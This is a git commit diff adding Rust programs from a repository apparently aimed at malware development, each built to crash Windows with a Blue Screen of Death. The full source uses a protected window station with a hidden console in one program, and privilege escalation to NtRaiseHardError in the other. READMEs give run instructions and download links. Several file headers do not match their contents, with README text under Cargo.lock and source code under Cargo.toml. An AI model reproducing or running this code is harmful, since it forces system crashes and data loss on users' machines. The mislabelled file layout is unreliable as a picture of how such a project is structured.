Add project directory changes

Added a project directory for each PoC with a README.md file. Included a download option for easier access to specific PoCs. All PoCs will soon have these features.

Author: Whitecat18

BSOD/README.md

@@ -1,4 +1,4 @@
-## BSOD Techniques
+# BSOD Techniques in Rust      
 
 ![Blue Screen Of Death](https://cdn.mos.cms.futurecdn.net/PJyEybKyQhGBpM4QXw7ccH.jpg)
 
@@ -10,6 +10,9 @@ Here you can find the BSOD Implementation Techniqes..
 * [WinLogon](./ntsd_winlogon/)
 * [NtSetInformationProcess](./ntsetinformationprocess/)
 
+[Download](https://downgit.github.io/#/home?url=https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/BSOD)
+
+
 > NOTE: These are old Techniques that i found on forum and i could'nt find the original authors. 
 
 For Errors DM: [@5mukx](https://x.com/5mukx)

BSOD/bsod_NtRaiseHardError/Cargo.lock

@@ -4,3 +4,13 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
+winapi = { version = "0.3", features = [
+    "consoleapi",
+    "handleapi",
+    "minwindef",
+    "winbase",
+    "wincon",
+    "winuser",
+    "windowsx",
+    "winnt",
+] }

BSOD/closewindowstation/Cargo.lock

@@ -0,0 +1,38 @@
+# CloseWindowStation BSOD
+
+A Rust program that demonstrates how to trigger a Blue Screen of Death (BSOD) by manipulating window station handles.
+
+[Download](https://downgit.github.io/#/home?url=https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/BSOD/closewindowstation)
+
+## Author
+@5mukx
+
+## Description
+This program demonstrates a technique to trigger a BSOD by:
+1. Creating a new window station
+2. Setting handle information to protect from close
+3. Manipulating window station handles
+4. Using specific memory addresses for system stability
+
+## Features
+- Uses Windows API functions for window station manipulation
+- Demonstrates handle protection techniques
+- Hides console window during execution
+
+## Dependencies
+- winapi
+
+## Usage
+1. Compile the program using Cargo
+2. Run the executable
+3. BSOD will be triggered through window station manipulation
+
+## Technical Details
+The program uses several Windows API functions:
+- CreateWindowStationA
+- SetHandleInformation
+- GetConsoleWindow
+- ShowWindow
+
+## Warning
+This program is for educational purposes only. Running it will cause a system crash and data loss. Use with caution and only in controlled environments. 

BSOD/closewindowstation/Cargo.toml

@@ -1,3 +1,42 @@
-fn main() {
-    println!("Hello, world!");
+/*
+    Trigger BSOD Using CloseWindowStation()
+    @5mukx
+*/
+
+use std::ptr::null_mut;
+
+use winapi::{
+    ctypes::c_void,
+    shared::{
+        minwindef::HWINSTA, 
+        windef::HWND}, 
+    um::{
+        handleapi::SetHandleInformation, 
+        minwinbase::SECURITY_ATTRIBUTES, 
+        winbase::HANDLE_FLAG_PROTECT_FROM_CLOSE, 
+        wincon::GetConsoleWindow, 
+        winuser::{CreateWindowStationA, ShowWindow, SW_HIDE}
+    }
+};
+
+fn main(){
+    unsafe{
+        let hwnd: HWND = GetConsoleWindow();
+        ShowWindow(hwnd, SW_HIDE);
+
+        let dwaddr: u32 = 0x80000000 | 0x40000000;
+        
+        let hwinsta:HWINSTA = CreateWindowStationA(
+            "WindowStation\0".as_ptr() as *const i8, 
+            0, 
+            dwaddr,
+            null_mut() as *mut SECURITY_ATTRIBUTES,
+        ); 
+
+        SetHandleInformation(
+            hwinsta as *mut c_void,
+            HANDLE_FLAG_PROTECT_FROM_CLOSE, 
+            HANDLE_FLAG_PROTECT_FROM_CLOSE,
+        );
+    }
 }

BSOD/closewindowstation/README.md

@@ -4,3 +4,5 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
+winapi = { version = "0.3", features = ["ntstatus", "processthreadsapi", "errhandlingapi", "securitybaseapi", "winbase", "winnt", "wtypesbase"] }
+ntapi = "0.4"

BSOD/closewindowstation/src/main.rs

@@ -0,0 +1,40 @@
+# LookupPrivilegeValue BSOD
+
+A Rust program that demonstrates how to trigger a Blue Screen of Death (BSOD) by manipulating system privileges and using the NtRaiseHardError API.
+
+[Download](https://downgit.github.io/#/home?url=https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/BSOD/lookupprivilegevalue)
+
+
+## Author
+@5mukx
+
+## Description
+This program demonstrates a technique to trigger a BSOD by:
+1. Obtaining process token with necessary privileges
+2. Looking up and enabling the shutdown privilege
+3. Adjusting token privileges
+4. Raising a hard error using NtRaiseHardError
+
+## Features
+- Uses Windows API functions for privilege manipulation
+- Demonstrates proper error handling
+- Interactive user prompt before triggering BSOD
+
+## Dependencies
+- winapi
+- ntapi
+
+## Usage
+1. Compile the program using Cargo
+2. Run the executable
+3. Press any key when prompted to trigger the BSOD
+
+## Technical Details
+The program uses several Windows API functions:
+- OpenProcessToken
+- LookupPrivilegeValueA
+- AdjustTokenPrivileges
+- NtRaiseHardError
+
+## Warning
+This program is for educational purposes only. Running it will cause a system crash and data loss. Use with caution and only in controlled environments. 

BSOD/lookupprivilegevalue/Cargo.lock

@@ -1,3 +1,92 @@
+/*
+    Program to invoke BSOD setting up privileges and provoking NtRaiseHardError.
+    @5mukx
+
+*/
+
+use ntapi::ntexapi::NtRaiseHardError;
+use std::ffi::CString;
+use std::ptr;
+use winapi::shared::ntstatus::STATUS_ASSERTION_FAILURE;
+use winapi::shared::wtypesbase::ULONG;
+use winapi::um::errhandlingapi::GetLastError;
+use winapi::um::processthreadsapi::GetCurrentProcess;
+use winapi::um::processthreadsapi::OpenProcessToken;
+use winapi::um::securitybaseapi::AdjustTokenPrivileges;
+use winapi::um::winbase::LookupPrivilegeValueA;
+use winapi::um::winnt::{
+    LUID, SE_PRIVILEGE_ENABLED, SE_SHUTDOWN_NAME, TOKEN_ADJUST_PRIVILEGES, TOKEN_PRIVILEGES,
+    TOKEN_QUERY,
+};
+
 fn main() {
-    println!("Hello, world!");
+    println!("Press any key to trigger a BSOD.");
+    let mut input = String::new();
+    std::io::stdin().read_line(&mut input).unwrap();
+
+    unsafe {
+        let mut token_handle: winapi::um::winnt::HANDLE = ptr::null_mut();
+        if OpenProcessToken(
+            GetCurrentProcess(),
+            TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
+            &mut token_handle,
+        ) == 0
+        {
+            println!("Failed to open process token.");
+            return;
+        }
+
+        let mut luid: LUID = LUID {
+            LowPart: 0,
+            HighPart: 0,
+        };
+        let shutdown_privilege = CString::new(SE_SHUTDOWN_NAME).unwrap();
+        if LookupPrivilegeValueA(ptr::null(), shutdown_privilege.as_ptr(), &mut luid) == 0 {
+            println!(
+                "Failed to lookup privilege value. Error: {}",
+                GetLastError()
+            );
+            return;
+        }
+
+        let tp: TOKEN_PRIVILEGES = TOKEN_PRIVILEGES {
+            PrivilegeCount: 1,
+            Privileges: [winapi::um::winnt::LUID_AND_ATTRIBUTES {
+                Luid: luid,
+                Attributes: SE_PRIVILEGE_ENABLED,
+            }],
+        };
+
+        AdjustTokenPrivileges(
+            token_handle,
+            0,
+            &tp as *const _ as *mut _,
+            0,
+            ptr::null_mut(),
+            ptr::null_mut(),
+        );
+
+        if GetLastError() != 0 {
+            println!(
+                "Failed to adjust token privileges. Error: {}",
+                GetLastError()
+            );
+            return;
+        }
+
+        // Raise hard error
+        let mut response: ULONG = 0;
+        let status = NtRaiseHardError(
+            STATUS_ASSERTION_FAILURE,
+            0,
+            0,
+            ptr::null_mut(),
+            6,
+            &mut response,
+        );
+
+        if status != 0 {
+            println!("Failed to raise hard error. Status: {}", status);
+        }
+    }
 }

BSOD/lookupprivilegevalue/Cargo.toml

@@ -4,4 +4,11 @@ version = "0.1.0"
 edition = "2021"
 
 [dependencies]
-winapi = { version = "0.3.9", features = ["handleapi", "winbase", "winuser", "winnt", "wincon", "tlhelp32"] }
+winapi = { version = "0.3.9", features = [
+    "handleapi",
+    "winbase",
+    "winuser",
+    "winnt",
+    "wincon",
+    "tlhelp32",
+] }